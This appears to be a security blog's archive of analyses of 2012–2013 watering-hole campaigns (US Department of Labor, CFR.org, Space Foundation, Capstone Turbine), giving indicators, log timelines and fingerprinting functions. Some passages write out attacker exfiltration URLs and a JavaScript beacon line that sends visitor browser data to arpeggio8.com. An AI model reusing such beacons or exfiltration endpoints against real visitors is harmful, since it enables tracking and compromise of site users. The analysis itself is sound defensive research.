Tag Archives: watering hole attacks

Department of Labor Watering Hole Campaign Review

On April 30th, the watering hole campaign was published on a private mailing list and the May 1st, Invicia and AlienVault publicly reported, with technical details, that United States Department of Labor (DOL) Site Exposure Matrices (SEM) website had been compromised and was hosting malicious code. This malicious code was used in watering hole attack targeting at first employees of US Dept of Energy that work in nuclear weapons programs. This malicious code was also used to gather information’s on the visitors of the compromised website.

The exploit used in this campaign was firstly reported as CVE-2012-4792, an Internet Explorer 0day used in December 2012 in CFR.org watering hole campaign and patched by Microsoft in January 2013. Despite the patch release some forks of this exploit were still used in targeted attacks against political parties, political dissidents, online medias and human right activists.

Two days later, FireEyeInvicia and AlienVault concluded that the vulnerability targeted during this attack campaign was not CVE-2012-4792 as they originally reported but a new Internet Explorer 8 vulnerability identified as CVE-2013-1347. This turnaround had unfortunately occur to late. Casual attacker, chaotic actors, organized crime and potentially other states involved in sponsored espionage had the opportunity to study the attack and recover the evidences.

Microsoft has acknowledge the vulnerability in a Microsoft Security Advisory published on May 3rd and identified as MSA-2847140 and has provide a “Fix it” solution to mitigate Internet Explorer 8 vulnerability.

Also, Adobe has announce through APSA13-03 that a critical vulnerability (CVE-2013-3336) is actually exploited against ColdFusion. This vulnerability could permit an unauthorized user to remotely retrieve files stored on the server, through “CFIDE/administrator“, “CFIDE/adminapi” and “CFIDE/gettingstarted*” directories. Adobe ColdFusion is used by DOL and this vulnerability has surely be used in order to compromise the server.

Possible Causes of Confusion between CVE-2012-4792 and CVE-2013-1347

Confusions with CVE-2012-4792 was possible due to similarities in used code and technics:

Usage of widely used JavaScript functions and variables

function getCookieVal(offset)“, widely used, is also present in original CVE-2012-4792 exploit and other forks.
function GetCookie(name)“, widely used,  is also present in original CVE-2012-4792 exploit and other forks.
function SetCookie(name,value)“, widely used, is also present in original CVE-2012-4792 exploit and other forks.
var ua = window.navigator.userAgent.toLowerCase()“, widely used, is also present in original CVE-2012-4792 exploit and other forks.

Usage of particular JavaScript functions also present in previous watering hole campaigns

function DisplayInfo()” also seen in CVE-2012-4792 & CVE-2011-0611 exploits.
function download()” & “function callback()” also seen in CVE-2012-4792 exploit.

Usage of Ajax XMLHttpRequest

This JavaScript object is used to download “bookmark.png” file and was also used to download  “xsainfo.jpg” file in CVE-2012-4792.

Similarities in the JavaScript code structure

If you compare the original CVE-2012-4792 JavaScript code and Exodus Intel fork, with this new exploit, the code structure is very similar in many aspects.

Usage of HTML+TIME technic

HTML+TIME, which is based on the Synchronized Multimedia Integration Language (SMIL), was also used in certain CVE-2012-4792. This technic was explained by Exodus Intel beginning January 2013.

Target selection

Parts of the code targets only Windows XP, Internet Explorer 8 and certain languages, like CVE-2012-4792.

Differences between CVE-2012-4792 and CVE-2013-1347, and Particularities

Some new particularities were present in the exploit and associated watering hole campaign:

Usage of PHP files

All previous watering hole attacks have use HTML or JavaScript files. PHP usage naturally limit the number of potential servers who could be used to start the exploitation and spread the malware. This approach increasingly the technic used by Exploit Kits, maybe a source of inspiration and effectiveness for states involved in sponsored espionage.

Usage of Base64 obfuscation

Obfuscation with base64 encoding (“base64.js” file) was used to hide parts of the exploit. CVE-2012-4792 was using “robots.txt” obfuscated with substitutions and HEX encoding.

Use-After-Free type

As mentioned by sinn3r of Metasploit team, CVE-2012-4792 was a CButton object use-after-free and CVE-2013-1347 is a CGenericElement object use-after-free.

dol[.]ns01[.]us Exploit Hosting Domain Evolutions

Invicia and AlienVault have report that the browser was redirected to the content hosted at dol[.]ns01[.]us which lead to the infection. A urlQuery, of 2013-05-01, is mentioned and refer to dol[.]ns01[.]us on port 8081/TCP. One hit related to the information gathering script is mentioning a last modified date of Thu, 14 Mar 2013 20:06:36 GMT. You can also observe in the executed JavaScript that the hxxp://dol[.]ns01[.]us:8081/web/js.php and hxxp://dol[.]ns01[.]us:8081/web/css.js URL’s are present in the code.

96.44.136.115-3

But if you take a look to a previous urlQuery report of 2013-04-29, hxxp://96[.]44[.]136[.]115/web/js.php, hxxp://96[.]44[.]136[.]115/web/css.js and hxxp:///web/xss.php are mentioned and coded in the executed JavaScript. 96[.]44[.]136[.]115 IP address is mentioned by AlienVault as the IP address behind dol[.]ns01[.]us. As you can see no specific destination port is present and the last modified date is the same. So we can conclude that the guys behind this campaign have change the malicious code during this interval.

urlquery-dol-1

You can observe this evolution with the urlQuery submission of 2013-04-30.

urlquery-2

All these urlQuery submission’s were done with a non Internet Explorer 8 user agent, and as the exploit malicious code was designed to only target Windows XP and Internet Explorer 8, part of the redirection were not present as evidences.

If you observe “/scripts/textsize.js” JavaScript code hosted on DOL website, you can see a first JavaScript inclusion to “hxxp://dol[.]ns01[.]us:8081/web/xss.php” and a second one to “hxxp://dol[.]ns01[.]us:8081/update/index.php“.

The first inclusion “/web/xss.php” was used in order to gather information’s on the DOL website visitors and the second inclusion “/update/index.php” was used to start the exploitation of CVE-2013-1347.

Information Gathering Scripts

As described by AlienVault, the information gathering code “/web/xss.php” on dol[.]ns01[.]us use different JavaScript functions to collect information’s from the system and upload the result to the malicious server.

I found that the information’s gathering script was different depending on the used browser. Here under a description of the JavaScript functions involved in information’s gathering depending on used browsers.

DOL Information Gathering Functions

JavaScript Function(s)Targeted Browser(s)Function Description
jstocreate()Internet ExplorerTest the presence of the Avira, Bitdefender 2013, McAfee VirusScan Enterprise, AVG Secure Search, ESET NOD32, Dr.Web, Microsoft Security Essentials, Sophos, F-Secure Antivirus 2011, Kaspersky 2012, Kaspersky 2013 anti-viruses.
flashver()Internet Explorer & Firefox & ChromeTest the presence and version of Adobe Flash, and supported OS.
officever()Internet ExplorerTest the presence and version of Microsoft Office
plugin_pdf_ie()Internet ExplorerTest the presence of Adobe Reader
bitdefender2012check()Internet Explorer & Firefox & ChromeTest the presence of BitDefender 2012 and try to disable it through disabledbitdefender_2012() function.
java()Internet Explorer & Firefox & ChromeTest the presence and version of Oracle Java plug-in
xunleicheck()Firefox & ChromeTest the presence of xThunder Chrome extension, an extension managing popular downloaders.
kavcheck()Firefox & ChromeTest the presence of Kaspersky Chrome extension
fiddlercheck()Firefox & ChromeTest the presence of Fiddler Chrome extension. Fiddler is an HTTP debugging proxy server application
liveheadercheck()Firefox & ChromeTest the presence of Live HTTP Header Chrome extension
webdevelopercheck()Firefox & ChromeTest the presence of Web Developer Chrome extension
avg2012check()Firefox & ChromeTest the presence of AVG 2012 Chrome extension
tamperdatacheck()Firefox & ChromeTest the presence of Tamper data Chrome extension
adblockcheck()Firefox & ChromeTest the presence of Adblocker Chrome extension
avastcheck()Firefox & ChromeTest the presence of Avast! Chrome extention
pluginverother()Firefox & ChromeTest the presence of all installed modules
All functions used by the information gathering script involved in the DOL watering hole campaign.

Also a specific information gathering technic was triggered when Internet Explorer was used. This technic is related to a non patched vulnerability in Internet Explorer 8, discovered by NSFOCUS and reported to Microsoft in 2011. The vulnerability could allow user information and even local file content leakage if a user views a specially crafted webpage using Internet Explorer.

SA2012-02

Once all information’s gathered, the script send all data’s on a specific URL “hxxp://dol[.]ns01[.]us:8081/web/js.php” and also call “hxxp://dol[.]ns01[.]us:8081/web/css.js” when the information’s are collected.

infogath-inclusions

infogath-js

An interesting information regarding “/web/css.js“, is that the “Last Modified” date reported by “dol[.]ns01[.]us” server is Thu, 14 Mar 2013 20:06:36 GMT. This is reporting that the information gathering infrastructure was in place since mid-March minimum.

dol.ns01.us-8081-1

Interesting facts regarding these information gathering scripts are:

  • Scripts “xss.php“, “js.php” & “css.js” have move from IP 96[.]44[.]136[.]115 on port 80/TCP to domain dol[.]ns01[.]us port 8081/TCP. Move from port 80/TCP to 8081/TCP doesn’t seem to be logic, most of time outgoing connexion’s authorized on Firewalls, for corporate Web surfing, are 80/TCP and 443/TCP.
  • Different types of information gathering scripts were in place, and all users who have visit DOL website were affected by this information gathering campaign.
  • Usage of a specific information leakage vulnerability present in Internet Explorer 8 and not fixed by Microsoft.
  • BitDefender 2012 deactivation attempt is confusing. Why trying to deactivate an anti-virus, this will surely generate an alert.
Information Gathered on dol[.]ns01[.]us

As described in the previous chapter, the information gathering code send a lot of information’s to the backend. Hopefully for security researchers, the backend wasn’t very well protected and all collected information’s were accessible without any restrictions in different web folders. You can find here under some statistics related to the gathered information’s.

TOP-10-TARGETED-COUNTRIES

Complete geolocation of the targeted source IPs

GEO-LOCALISATION

By analyzing the information’s sent to the backend, we can also see that DOL (www.sem.dol.gov) wasn’t the only compromised website:

  • From 2013-03-15 to 2013-04-29 : University Research Co. Cambodia website (www.urccambodia.org) was the first target .This explain the high number of distinct IP addresses from Cambodia.
  • From 2013-04-08 to 2013-04-24 : Awards for Excellence in Education website (www.forexcellenceineducation.org), a program of Fraser Institute, was the second target.
  • From 2013-04-08 to 2013-04-24 : ElectionGuide website (www.electionguide.org), provided by the International Foundation for Electoral Systems (IFES), was the third target.
  • From 2013-04-09 to 2013-04-30 : French Institute of International Relations website (www.ifri.org), was the fourth target.
  • From 2013-04-09 to 2013-04-24 : The Working for America Institute website (www.workingforamerica.org), was the fifth target.
  • From 2013-04-09 to 2013-04-10 : The Project 2049 Institute website (www.project2049.net), was the sixth target.
  • From 2013-04-10 to 2013-04-10 : The Union Label and Service Trades Department website (www.unionlabel.org), was the seventh target.
  • From 2013-04-11 to 2013-04-30 : Thales Catalogue website (components-subsystems.thales-catalogue.com), was the eighth target.
  • From 2013-04-23 to 2013-05-01 : United States Department of Labor (DOL) Site Exposure Matrices (SEM) website (www.sem.dol.gov), was the ninth target.

Here under the hits by browsers and Internet Explorer 8 hits by OS.

Hits-by-Browsers

IE8-Hits-os2

Others Information’s Gathered

As you have read in the previous chapter, ElectionGuide website (www.electionguide.org) was also targeted during this watering hole campaign. As you can see in the following urlQuery submission, dating from 2013-05-01, 96[.]44[.]136[.]115 is also present but don’t respond any more. Also if you observe the urlQuery submission of 2013-05-0396[.]44[.]136[.]115 is still present, but a new backend server has been setup in order replace the once deactivated.

electionguide-both

electionguide-info-gath-inclusions

If you observe the “Last Modified” date of “css.js” file, the installation date of these files is at least the 2013-05-03.

electionguide-css

Also, by researching some patterns matching the information’s gathering script on Google you can find some previous unknown campaigns, that were using the same code.

56go-google

56go-google-cache

A Deeper Look In CVE-2012-4792 Watering Hole Campaigns – Alljap Chapter

This post is a small part of an in-depth analysis of the watering hole campaign of December involving an Internet Explorer 0day.  Jindrich Kubec and my self are working hard in order to synthesize all these information’s in order to provide you a high level overview.

As I mentioned to threatpost.com, the 14th January, additional web sites were discovered hosting Internet Explorer CVE-2012-4792 exploit. One of the additional web site was “All Jap auto parts” (www.alljap.net), an importer of second-hand japanese engines and car parts located in Brisbane, Queensland, Australia.

StopMalvertising published an analysis I recommend to you for additional information’s.

When I discovered this infected web, I noticed initially that the files were time stamped (HTTP Last-Modified entity-header) at the following dates:

  • deployJava.js : Fri, 14 Dec 2012 15:47:42 GMT
  • index.html : Fri, 14 Dec 2012 15:49:58 GMT
  • news.html : Fri, 14 Dec 2012 15:50:42 GMT
  • robots.txt : Fri, 14 Dec 2012 15:50:57 GMT
  • today.swf : Fri, 14 Dec 2012 15:51:08 GMT
  • xsainfo.jpg : Fri, 14 Dec 2012 15:56:44 GMT

index.html” file was supporting chinese simplified (zh-cn), taiwanese mandarin (zh-tw), japanese (ja), american english (en-us) and russian (ru). “girl” and “boy” patterns were present. And “hello” text was hidden.

CFR.org version of “index.html”, I discovered in Google cache and dating from the 7 December, was only supporting chinese simplified (zh-cn), taiwanese mandarin (zh-tw) and american english (en-us). “girl” and “boy” patterns were also present and “hello” text was not hidden.

CFR.org version, reported by FireEye, of around the 20 December, was supporting chinese simplified (zh-cn), taiwanese mandarin (zh-tw), japanese (ja), american english (en-us), russian (ru) and korean (ko). “girl” and “boy” patterns were no more present and replace by “ms-help:” technique to bypass ASLR on Windows 7. Also “hello” text was hidden.

By only analyzing these samples, from CFR.org and All jap auto part, we can observe that the attackers have changed tactics multiple times during this campaign.

By analyzing all the samples of other infected web sites (around 40 infected web sites samples), I observed that the All jap auto part was not used in the watering hole campaign. No high value legit websites where including, by iframe or by JavaScript inclusion, this website.

By doing some further analysis, regarding All jap auto part, I observed initially that hosted phpmyfaq and wwwboard tools were not updated since a long time. And after some Google dorks, I found two PHP backdoors and the Apache logs (from 13 November to beginning February) who were freely accessible from Internet. We will name the first backdoor BK1 and the second BK2 for further references in this blog post.

Having free access to the logs, was an unique opportunity to find additional evidences, regarding the attackers and the differences in the samples and patterns.

I first researched, in the logs, accesses to the backdoors. BK1 was not present in the logs, but BK2 was accessed the 7 December by IP 112.175.234.199. The IP is located in South Korea and is associated to FlyVPN.com VPN mirror. User agent associated to this IP is Internet Explorer 8 under Windows XP.

112.175.234.199 – – [07/Dec/2012 00:31:22 +0000] “GET /BK2.php HTTP/1.1” 200 371 “-” “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)”

By searching additional references to this IP, we can observe a first access to CVE-2012-4792 exploit the 7 December with a different user agent, Firefox 12 under Windows XP.

112.175.234.199 – – [07/Dec/2012 01:18:59 +0000] “GET /wwwboard/news/index.html HTTP/1.1” 200 5776 “http://www.gbn.com/” “Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0”

We can directly observe that the HTTP referer was Global Business Network (www.gbn.com) and that All jap auto part was also involved in a watering hole campaign. Description of GBN:

GBN helps organizations adapt and grow in an increasingly uncertain and volatile world. Using our leading-edge tools and expertise—scenario planning, experiential learning, networks of experts and visionaries—we enable our clients to address their most critical challenges and gain the insight, confidence, and capabilities they need to shape the future.

We can also confirm, like CFR.org, that the exploit was present on All jap auto part since minimum the 7 December.

By doing a complete log analysis we can observe the following time line and information’s.

Alljap - 112.175.234.199 - South Korea IP Activities

DatesUser AgentsActions
07/Dec/2012 00:31:22Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Access to BK2
07/Dec/2012 00:31:25 to 00:32:47Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Operations through BK2
07/Dec/2012 00:32:58Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Modify mail.php through BK2
07/Dec/2012 00:33:10Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Modify tw.htm through BK2
07/Dec/2012 00:33:24 to 00:40:05Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Operations through BK2
07/Dec/2012 01:18:59Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0Test 0day through GBN.com
07/Dec/2012 17:55:15Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0Test 0day through GBN.com

This IP has directly access to BK2, no other web pages visits. You can observe that some PHP mail code (mail.php) was put in place in order to send spear phishing email targeted to Taiwanese people’s (tw.htm). Bunch of operations have been done through BK2. Also you can observe that they test the exploit with Firefox 12.

Alljap - 113.30.106.94 - South Korea IP Activities

DatesUser AgentsActions
10/Dec/2012 08:15:34Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Check presence of 0day
10/Dec/2012 08:15:56 to 08:19:00Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Operations through BK2
10/Dec/2012 08:19:25Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Access to demo.txt (demo~) file
10/Dec/2012 08:19:34Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Test 0day
10/Dec/2012 08:20:13 to 08:22:11Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Operations through BK2
10/Dec/2012 08:27:30 to 08:29:54Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Test 0day through GBN.com

This IP has directly access to BK2, no other web pages visits, and manipulate the content of CVE-2012-4792 0day. The IP is located in South Korea with only a pptp VPN open port. You can also observe usage of a file named “demo.txt”.

Alljap - 59.124.14.102 - Taiwan IP Activities

DatesUser AgentsActions
10/Dec/2012 08:42:34Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Access to BK2
10/Dec/2012 08:42:38 to 08:44:00Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Operations through BK2
10/Dec/2012 08:54:36 to 08:54:49Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Test 0day through GBN.com
10/Dec/2012 09:09:52 to 09:09:57Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Operations through BK2
10/Dec/2012 09:11:08 to 09:11:55Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Access 0day files
10/Dec/2012 09:12:14 to 09:13:18Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0Test presence of deployJava.js
10/Dec/2012 09:13:41 to 09:15:36Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Operations through BK2
10/Dec/2012 09:23:10 to 09:28:11Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0Operations through BK2

This IP has directly access to the BK2, no other web pages visits, manipulate the content of CVE-2012-4792 0day and do some test from GBN.com. The IP is located in Taiwan with only a pptp VPN open port.

Alljap - 112.213.97.39 - Hong-Kong IP Activities

DatesUser AgentsActions
14/Dec/2012 15:44:40Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Access to BK2
14/Dec/2012 15:44:47 to 15:49:58Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Operations through BK2

This IP has directly access to the BK2, no other web pages visits, manipulate the content of CVE-2012-4792 0day. The IP is located in Hong-Kong with only a pptp VPN open port.

Alljap - 113.30.106.92 - South Korea IP Activities

DatesUser AgentsActions
14/Dec/2012 15:50:42Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Access to BK2
14/Dec/2012 15:50:57 to 15:52:57Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Operations through BK2

This IP has directly access to the BK2, no other web pages visits, manipulate the content of CVE-2012-4792 0day. The IP is located in South Korea with only a pptp VPN open port.

Alljap - 110.4.82.38 - South Korea IP Activities

DatesUser AgentsActions
14/Dec/2012 15:54:14Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0Check presence of demo.txt file
14/Dec/2012 15:55:04Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Access to BK2
14/Dec/2012 15:56:44Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Operation through BK2
14/Dec/2012 16:02:19 to 16:03:56 Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0Test 0day through GBN.com
16/Dec/2012 12:08:45 Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0Test 0day through GBN.com

This IP has directly access to the BK2, no other web pages visits, manipulate the content of CVE-2012-4792 0day and do some test from GBN.com. The IP is located in South Korea.

As you can see the attackers have use massively VPN connexions in order to connect themselves to BK2. If you compare the “Last-Modified” HTTP headers of the samples, you can see that they are corresponding to the last three different IPs manipulations.

As we have the complete Apache logs, I was also able to analyze the attack surface of the watering hole campaign through GBN.

My first analysis was to see all successful hits to “index.html” file from 7 December to 17 December, without any segregation. By clicking on the following link you will access to a Google Fusion Table providing all associated information’s.

alljap-all-hits

You can find also the TOP 10 of countries how have hit the exploit.

Alljap - All Hits TOP 10 Countries

CountryUnique IP count
US311
BR77
CN64
TR44
GB30
DE25
CA23
IN19
FR19
MX18

My second analysis was to see all potential successful exploitation targeting “MSIE 8.0“, from 7 December to 17 December. By clicking on the following link you will access to a Google Fusion Table providing all associated information’s.

alljap-msie8-hits

You can find also the TOP 10 of countries how have hit the exploit.

Alljap - All MSIE 8.0 Hits TOP 10 Countries

CountryUnique IP count
US35
CN13
TR5
BR3
GB3
RO3
MA3
AU3
HK2
TH2

You can see that the potential success rate, compared to the visitors of GBN is very low. The fact to use a 0day only capable to target MSIE 8.0 was clearly a limiting point.

As explained at the beginning of the blog post, the post is only a small part of that has been analyzed. Jindrich Kubec and me will provide you additional information’s soon.

Forgotten Watering Hole Attacks On Space Foundation and RSF Chinese

As I announced you on Twitter, this blog post will present targeted attacks who have start mid-September and wasn’t discussed or presented in public. These attacks have end around mid-October.

A web site “arpeggio8.com“, hosted on 205.186.179.195 in US, was compromised in order to be used in a watering hole attack against Space Foundation and RSF Chinese.

The Space Foundation is a nonprofit organization that supports the global space industry through information and education programs. It is a resource for the entire space community – industry, national security organizations, civil space agencies, private space companies and the military around the world. It also supports educators, students and journalists with information and education programs.

Reporters Without Borders (RWB) is a French-based international non-governmental organization that advocates freedom of the press and freedom of information. Reporters Without Borders is also known as RSF, and RSF Chinese is a dedicated web site for Chinese news in Chinese language.

The watering hole attack was done through different files and by a dedicated centralized backend named “Jsbug“.

Description of the watering hole attack

Space Foundation and RSF Chinese web sites had they’re code a malicious javascript inclusion calling “http://www.arpeggio8.com/count/count.php“.

SpaceFoundation-RSFChinese-CVE-2012-4969

count.php” script provide javascript content who check the presence of “popad” cookie and if the browser is Internet Explorer 6, 7 or 8. This script also load “count2.php” who is used for another purposes, we will discuss about this file later. If all the conditions are in place “rsf.php” file is loaded with parameter “id=1024“.

rsf.php” script only provide content if parameter “id=1024” is present. This script load through an iframe call “ie.html” file. “rsf.php” is the equivalent of “exploit.html” in the CVE-2012-4969 0day found in mid-September.

ie.html” file is the equivalent of “Protect.html” in the CVE-2012-4969 0day found in mid-September, but here no Flash file is involved to do the heap spray. “ie.html” file is containing a packed javascript code how will do the heap spray and trigger the vulnerability. Pastebin encoded version and decoded version.

The javascript is decoded though the “decode” function and the key “0xe1” for decoding is provided as argument to the function. The javascript “int_to_hex” function will check if Oracle Java 6 is present, if operating system is Windows 7 or XP and if Internet Explorer 9 is used. The script will also gather the browser language.

decode

If Windows XP is used, and language is “en-us“, “zh-cn“, “zh-tw“, “ko” or “ja” (hum hum CVE-2012-4792…), then the vulnerability is triggered.

If Windows 7 is used and Java 6 is installed, then the vulnerability is triggered. A spray base value is provided in the code for Internet Explorer 9 , but “count.php” has filter the targeted browsers.

Once the vulnerability is triggered, “917.exe” (6b4aa596e5a4208371942cdb0e04dfd9) file is installed. This malware is known as “Trojan-Dropper.Win32.Dapato.bscc“.

A interesting point regarding “ie.html” file, this file was dating of 19 September.

rsf-ie-cve-2012-4969

Some facts regarding CVE-2012-4969 :

  • Vulnerability was discovered exploited in the wild, with a Flash variant, the 14 September.
  • Metasploit PoC was provided the 17 September.
  • Microsoft Security Advisory MSA-2757760 was published the 17 September.
  • Microsoft patch was provided in MS12-063 the 21 September.

But you will see, through the next chapter, that the attack has began the 18 September.

“count2.php” script and Jsbug backend usage

count2.php” script is loaded in any cases for statistics purposes. This script will create and check two cookies “stat_cookie” and “stat_time“, gather version of Adobe Flash, presence of Oracle Java and HTTP referrer. All these informations are send back to the same script with parameters.

http://arpeggio8.com/count/count2.php?n=’+Math.random()+’&action=jpg&stat_refer=’+escape(location.href)+’&stat_flash=’+escape(flashVer)+’&stat_java=’+escape(stat_java)+’&stat_cookie=’+stat_cookie+’&stat_time=’+stat_time;

All these informations are stored in a backend named “Jsbug“. This backend is quiet simple, only three menus “Client statistics“, “Report” and “Create Exploit“. The backend doesn’t have any external css or images files, and is typically composed of minimum three PHP scripts.

jsbug-backend-typical-files

Login page of the backend is also quiet simplistic, no page title, no text in the page, and this logic of simplicity make it harder to discover through Google searches.

jsbug-backend-login-page

Client statistics” menu will direct you on a recap page, of all visitors who have load “count2.php“, with OS type, browser type and version, version of Adobe Flash, version of Oracle Java, IP address, HTTP referer, number of visits, first visite and last visite date.

In the case of the Space Foundation watering hole attack, the first date are beginning 18 September.

jsbug-space-foundation-start

In the case of RSF Chinese watering hole attack, the first date are beginning 19 September.

jsbug-rsf-chinese-start

These attacks have ended around mid-October.

Report” menu will direct you on a statistics page, of all visitors.

jsbug-backend-stats

Create Exploit” menu is a page how will help the attackers to generate they’re javascript inclusion code.

jsbug-backend-create-exploit

Capstone Turbine Corporation Also Targeted in the CFR Watering Hole Attack And More

Since the release of MSA-2794220 by Microsoft, regarding the CVE-2012-4792 vulnerability, a Fix-it solution has been provided KB2794220. I urgently advise you to apply this Fix-it solution, or to use another browser, until the release of the final patch surely planned for the 8 January Microsoft Patch Tuesday.

I have some interesting and funny additional information’s regarding the CFR watering hole attack, and I would like to share them with you. But previously I recommend you to read the following analysis done by security companies or independent security researchers:

Let’s start with the analysis of only two samples, “news_14242aa.html” and “Helps.html“. These two samples are quiet interesting, and a complete blog post is enough for them. I will analyze the other samples in dedicated further blog posts.

news_14242aa.html (545cb268267609910e1312399406cdbc)

This sample was extracted from Google cache with a cache date of 7 Dec 2012 14:12:28 GMT. This sample clearly demonstrate that the compromise of CFR.org wasn’t the 20, or 21 December as mentioned by security companies or medias, but really sooner. The proof is still indexed and in cache of Google.

Capture d’écran 2012-12-28 à 22.25.31

cfr.org-hello

Helps.html (a25c13d4edb207e6ce153469c1104223)

I received this sample, around the 29 December.  This file is the equivalent of the first sample but with some modifications, you can see the differences in the following online diff. Additional languages have been added (jp – ru – ko),  all the stuffs regarding Microsoft Office documents have been removed (boy or girl), some additional “blank” locations have been added and the body text has been hide.

Now, if you do research on VirusTotal with this MD5, you can find a relate sample, but with another filename “config.html” who was submitted the 2012-12-31 18:29:47 UTC. Looks like interesting, but has to be confirmed.

If you execute a request on urlQuery in order to search all “config.html” file for the last past month, you will discover a submission, dating from 2012-12-29 22:58:29, for URL “http://www.capstoneturbine.com/_include/config.html” on server 74.62.198.72. If you take a look at the urlQuery report you can see some “deployJavaPlugin” strings.

The Capstone Turbine Corporation company description, make me believe that this company profile could be a choice of quality for targeted attack:

Capstone Turbine Corporation ® is the world’s leading producer of low-emission microturbine systems, and was first to market with commercially viable microturbine energy products. Capstone Turbine has shipped thousands of Capstone MicroTurbine systems to customers worldwide.

By doing a Google dork research “site:capstoneturbine.com “_include”” you can see something strangely similar to CFR.org “news_14242aa.html file.

capstoneturbine.com-hello

This page is also cached in google cache, and guess what ? Ho, Ho Ho, CVE-2012-4792 is in the house since the 18 December 16:10:40 GMT. So CFR.org was and is not the only target of this attack !

Now we will try to define the date of compromise of Capstone Turbine Corporation through research on Google by another google dork “capstoneturbine.com” “_include”“. And we can find some interesting informations 😉

capstoneturbine.com-clean-mx

On support.clean-mx.de we can discover that the same “/_include/config.html” URL was indexed since 2012-09-19 04:31:01. But what is awesome is the evidence attached to this submission hoho it is CVE-2012-4969 I discovered in September 🙂 “Grumgog.swf” is in the house.

CVE-2012-4969-capstoneturbine.com

My conclusions are:

  • CFR.org was comprised since minimum beginning December.
  • CVE-2012-4792 was present on CFR.org since minimum beginning December.
  • CVE-2012-4792 was also used to target visitors of another company named Capstone Turbine Corporation.
  • CVE-2012-4792 was present on Capstone Turbine Corporation since minimum 18 December.
  • Capstone Turbine Corporation was also used to spread CVE-2012-4969 and this since mid-September.
  • Potentially Capstone Turbine Corporation is compromised since minimum beginning September
  • Potentially the guys behind CVE-2012-4969 and CVE-2012-4792 are the same.

But, there is always a but in a story, take a look at the first submission for Capstone Turbine Corporation in August, “http://www.capstoneturbine.com/_flash/videos_native/exploit.html “. Imagine 🙂

Update 1 – 2013-01-02 1:30 am:

Jindrich Kubec director of Threat Intelligence at avast! confirm presence of CVE-2012-4969 in September on Capstone Turbine Corporation.